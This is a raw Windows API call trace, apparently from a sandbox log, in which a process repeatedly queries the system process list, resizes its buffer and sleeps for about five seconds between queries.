0x0 [0123.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.634] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.634] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.646] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.646] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.647] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.647] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.647] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.650] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.661] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.662] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.663] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.666] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.680] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.682] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.682] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.694] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.694] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.694] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.697] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.697] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.709] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.712] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.712] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.725] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.725] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.729] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.741] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.744] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.745] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.778] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.779] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.786] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.787] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.790] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.791] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.802] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.803] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.803] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.803] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.806] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.806] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.821] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.822] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.834] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.838] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.849] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.849] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.854] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.871] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.886] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.899] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.902] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.916] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.927] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.927] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.928] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.930] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.948] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.949] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.959] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.959] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.960] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.960] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.963] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0123.974] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0123.974] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0123.974] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0123.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0123.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0123.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0123.978] 